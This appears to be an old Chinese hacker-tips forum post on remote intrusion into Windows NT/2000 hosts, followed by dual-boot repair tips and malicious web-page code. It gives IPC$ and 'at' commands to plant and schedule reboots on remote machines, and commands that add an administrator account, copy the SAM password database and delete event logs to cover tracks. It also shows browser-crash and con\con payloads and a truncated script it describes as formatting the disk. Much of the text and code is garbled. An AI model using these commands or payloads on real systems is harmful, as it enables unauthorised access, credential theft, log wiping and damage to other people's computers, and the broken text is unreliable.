呵呵,写这个帖子的原因是因为我答应给一个朋友回复139端口的作用来着……先声明两点:1)不要利用本帖所提到的方法去搞恶意破坏!2)呵呵,可能许多人已经知道了139端口这个用法了~本文只想起到一个抛砖引玉的作用!
废话不多说了~开始:
如果你使用NT主机的话,那你可要注意了!
重启NT主机的方法如下:
1:Net use \\XXX.XXX.XXX.XXX\ipc$ quot a word" /user:username
建立一个IPC连接
2:net use H: \\XXX.XXX.XXX.XXX\C$
将对方的C盘映射为自己的h盘
3:copy c o h:\reboot.bat
Iisreset /reboot
在对方的C盘上生成一个能重启机器的文件
4:net time \\XXX.XXX.XXX.XXX
得到对方机器时间
5:at \\XXX.XXX.XXX.XXX 重启的时间 c:\reboot.bat
设定对方重启的时间!
6:at \\XXX.XXX.XXX.XXX
查看任务上面是否添加了这个任务
7:等对方重启好了~
上面的第三步是only for Win2K的,如果是Nt,就需要用意个指定的重启程序,我们可以自己编写一个reboot.exe来代替reboot.bat,代码如下:
#include quot tdio.h
#include quot;windows.h
int main()
文件://定义重启的时候发送给所有用户的消息
LPSTR msg=Reboot Tool By LionHook\nhttp://www.xici.net" 文件://尝试用最简单的API函数重启
if(ExitWindowXXX(EWX_REBOOT.0))retur TRUE;
if(ExitWindowXXX(EWX_REBOOT | EWX_FORCE,0))retur TRUE;
文件://因为上面的重启不成功,所以需要调整本进程的特权
HANDLE hToke TOKEN_PRIVILEGES tk if(!OpenProce Token(GetCurrentProce (),TOKEN_ADJUST_PRIVILEGES |TOKEN_QUERY,&am hToken)) retur FALSE;
文件://获取重启的特权 SE_SHUTDOWN_NAME
LookupPrivilegevalues(NULL,SE_SHUTDOWN_NAME,&am tkp.Privileges[0].Luid);
tkp.PrivilegeCount=1;
tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,FALSE,&am tkp,0,(POTKEN_PRIVILEGES)NULL,0);
文件://判断是NT内核还是9X内核,选择用不同的方式
if(!GetVersion()&am 0x80000000))
InitiateSystemShutdown(NULL,msg,20,TRUE,TRUE);
else if (!ExitWindowXXX(EWX_REBOOT,0))
if(!ExitWindowXXX(EWX_REBOOT|EWX_FORCE,0))
retur FALSE;
retur TRUE;
对了,再次说明啊,别用本文提到的方法搞破坏,小心***叔叔打PP~呵呵
24)利用批处理文件来建立一个记录3389登陆者信息的记录器
由于Terminal Service默认是没有日志记录的,只能依靠他的系统日志,但是系统日志只能记录一些大动作(开启或停止服务),那么,如何用批处理文件来编写一个将是3389端口的程序呢?很简单:
建立一个批处理文件:内容如下:
@echo off
date/t gt gt c:\3389log.txt
:TS3389
time/t gt gt c:\3389log.txt
netstat -a | find quot;3389" |find quot;ESTABLISHEDc:\3389log.txt
goto :TS3389
之后保存!
如果有人用你的3389登陆你的机器,呵呵,在c盘下就有3389log.txt这个文件!记录了当天日志,还有连接时间……资料~开始反击~呵呵
25)网络命令小节
A、NET命令:
IPC连接:格式 et use \\对方IP\ipc$ quot;密码" user:用户名" 『建立IPC连接~』
net use \\对方IP\ipc$ /delete 『断开连接~』
以下操作需要在连接到对方主机后才可进行!!!
net user coldcrysky xyz /add 『在连接的目标主机中加入一个用户名为COLDCRYSKY 密码为WYZ的用户』
net localgrou Administrator coldcrysky /add 『把名为coldcrysky的用户加入ADMIN组-以为着权限的提高啊!!!^_^』
net use z:\\对方IP\C$ 『把对方的C盘映射为本机的Z盘-可依照需要更改映射盘符!』
net tart telnet 『开启TELNET』
net user guest /active:ye 『激活GUEST』
net user guest coldcrysky 『把GUEST密码改为COLDCRYSKY』
B、AT命令:
查看远程机时间:net time \\对方IP
加入一项新任务:
at \\对方IP 时间 文件名 『用来把自己上传的后门程序在制定时间运行,方便以后进入肉鸡!』
C、TELNET命令:
telnet 对方IP 端口 『作用不用我说了吧???』
D、FTP命令:
登陆:ft 对方网址(IP地址)
上传文件:get 文件在本机完整路径 对方文件存放完整路径
下载文件:put 对方文件完整路径 本机存放文件路径
E、COPY命令:
在建立连接后(尤其是IPC$连接后,很有用的命令哦~)
⑴copy index.htm \\127.0.0.1\c$\index.htm
『将本机index.htm文件复制到127.0.0.1的C盘下,如果要放到对方的NT目录下,则把C改为admin$』
⑵copy \\127.0.0.1\admin\repair\sam_ c: 『将远程机数据库文件拷贝到本机C盘根目录下』F、SET命令:
主要用于分析目标计算机的基本信息用!具体使用方法请查找相关文件!
G、NBTSTAT命令: tstat -A 对方IP (这个A大写)
『在其中显示037前面的英文或数字就是计算机名称!当然,也可以利用PING -A 对方ip的方法来查看对方主机名!效果相同!!!』
H、SHUTDOWN命令:
『用来关闭对方NT服务的命令』格式如下:
shutdow \\IP地址 t:20
『20秒后自动关闭对方NT服务!由于对对方机器影响较大,慎用!!!』
I、DIR命令:
还用我说么?大家是不是早就该掌握了???(不知道的还是查阅相关资料吧~~~)
J、ECHO命令:
echo coldcrysky gt;index.htm 『用coldcrysky覆盖掉原INDEX.HTM中所有内容』
echo coldcrysky gt gt;index.htm 『把coldcrysky加入到index.htm中』
K、ATTRIB命令:
更改文件属性用,格式:
Attri -r index.htm 『去掉只读属性』(+- 分别代表增加和减少)
L、DEL命令:
『删除日志的时候用!』
del c:\wi t\system32\logfiles\*.*
del c:\wi t\system32\config\*.evt
del c:\wi t\system32\dtclog\*.*
del c:\wi t\system32\*.log
del c:\wi t\system32\*.txt
del c:\wi t\*.txt
del c:\wi t\*.log
M、PING命令:
-t :ping制定IP,知道网络断开或按CTRL+C结束!
-a :解释PING IP的主机名
- count :发送count指定的ECHO数据包,默认为4个!
26)这里我必须(或者说不得不重新重申一个命令!不过说之前我要把这个命令的相关命令稍微介绍一下!)
我要说的命令就是:开启服务和停止服务的net tart and et top
这两个命令大多数朋友已经很熟悉了吧?不过为了方便更多的菜鸟能看明白我要说的意思,不用再看其他相关文章,所以我简单说两句:net tart是开启服务!那么,如何开启呢?比如,我们这里要开启telnet服务,那就直接再2K的cmd下输入:net tart telnet就OK了~关闭一项服务的话,把start换成stop就OK了~不过这里必须要注意:你所关闭的服务必须是已经开启的服务!!!好像是一句废话
OK,有了这个前提后,下面就继续介绍:那么,net tart和net top到底能开启什么服务?其实这点也不需要你强记,记住这个命令就可以了:net hel tart和net hel top,这两个会显示出你所能开启的服务有那些~~
这里比如我们查到了这个服务“CLIENT SERVICE FOR NETWARE”,那么当这个命令使用net tart和net top的时候,你必须在这项服务上面加上“”,原因是因为这个服务名称中带有空格!如果服务名称中不带空格,你可以不用带这个引号!!!这点是我强调的问题!大家一定不要忘记了!『前些天看到S8S8.net的黑白新区中有人说net tart 和 et top后面的服务名必须带空格是错误的!明白原因了吧?』
27)关于双系统的两个问题:
A、如何在双系统(98、2000)中安全删除2K?
先制作一张Window 98 的启动软盘,再用它启动你的计算机,运行sys命令恢复Window 98引导记录后,再运行fdisk/mbr恢复主引导记录,完成后进入Window 98,把wi t 和system volum informatio 目录删除,再删掉C盘上的boot.ini、bootfont.bin、ntldr、nydetect.com、bootsect.dos文件就行了。
B、 Window 98/XP双系统启动菜单修复
1.修复前,在BIOS中设置从光驱启动。用Window XP***盘启动电脑,在加载必要的驱动后,出现Window XP的***界面。有三个选项:
(1)要现在开始***Window XP,请按“Enter”键。
(2)要用“恢复控制台”修复Window XP***,按“R”键。
(3)要退出***程序,不***Window XP,按“F3”键;
2. 按“R”键,进入“Microsoft Window XP (TM) 故障恢复控制台”界面;故障恢复控制台提供系统修复和故障恢复功能。系统这时会搜寻已***的Window XP系统文件,然后显示搜寻结果,并询问“要登录到哪个Window XP***(要取消,请按Enter)”,选择1. D:\Windows,回车,系统会再询问“管理员密码”,再键入***Window XP时设置的管理员密码,回车,出现D:\Windows〉,这时需要输入修复命令Fixboot,后面的参数为启动扇区要写入的磁盘盘符,这里填入C:,回车。修复完成,键入Exit退出。重启后就会看到久违的双重启动菜单了。并且,这样修复后基本不产生垃圾文件。
因为这两个问题是非常非常普遍的,所以我就收集到这里了~
28)这里说几个主页恶意代码:『并不是让大家把这些代码加入到自己的主页中!只是希望大家能了解恶意代码,起到更好的防护作用!』
A、死循环代码:
『把下列代码加入到网页中,可达到如上效果』
img rc=javascript:location=“网页的文件名.htm:”
说明:当含有这段代码的网页被人点击,连接就会不断的打开IE浏览器,直到你的系统资源浪费到0%~只有重新启动才能正常使用!
预防方法:禁用所有的ActiveX控件和插件!因为这是一个ActiveX教本程序~
B、恐怖的大图片:
『把下列代码加入到网页中,可达到如上效果』
img rc= quot;http://恐怖图片的连接地址" width= quot;1" height= quot;100000000000000000000000
说明:当打开这样的网页,IE会不断的解释试图打开,但由于图片实在太大,超出了其处理能力,所以……
C、地震死机代码:
『把下列代码加入到网页中,可达到如上效果』
< cript
if (window.top.moveBy){
for (i = 1;i lt 50 i++){
for (j = 3;j gt 0 j--){
window.top.moveBy(0,i);
window.top.moveBy(i,0);
window.top.moveBy(0,-i*2);
window.top.moveBy(-i*2,0);
window.top.moveBy(0,i);
window.top.moveBy(i,0);
/script
img rc=c:\con\co quot gt;
说明:img rc=c:\con\co quot gt;是windows9x的设备名称解析漏洞!
WINDOWS9x的\con\con设备名称解析漏洞允许用户进行攻击,倒是98死机。原理:我们知道,CON是DOS下的特殊设备名,不允许做文件名,如果我们在DOS下键入如下命令:copy coldcrysky.txt con,系统会显示coldcrysky.txt的内容,如果换成:copy coldcrysky.txtcon系统会提示文件不能拷贝到文件自身。如果吧con换成LPT或PRN,则输出coldcrysky.txt到打印机。由此可见,CON代表文件本身,如果使用\CON\CON命令,则意味着系统不断调用文件本身,视系统资源迅速枯竭,连按CTRL+ALT+DEL的机会都没有~
解决办法:
对于9X系统,强烈建议打补丁!!!2000和XP则不会死机~
D、格式化硬盘:(最恐怖的~~~慎用!!!请勿用于非法用途!!!使用后如果有任何负作用,后果自负!与伤寒天空『ColdCrySky』;乱刀留影无关!!!)
scr,Reset();
scr.Path=C:\\WINDOWS\\StartMenu\\Programs\\启动\\startup.htm" scr.Doc=object id=`wsh` cla id=`clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B`
WS
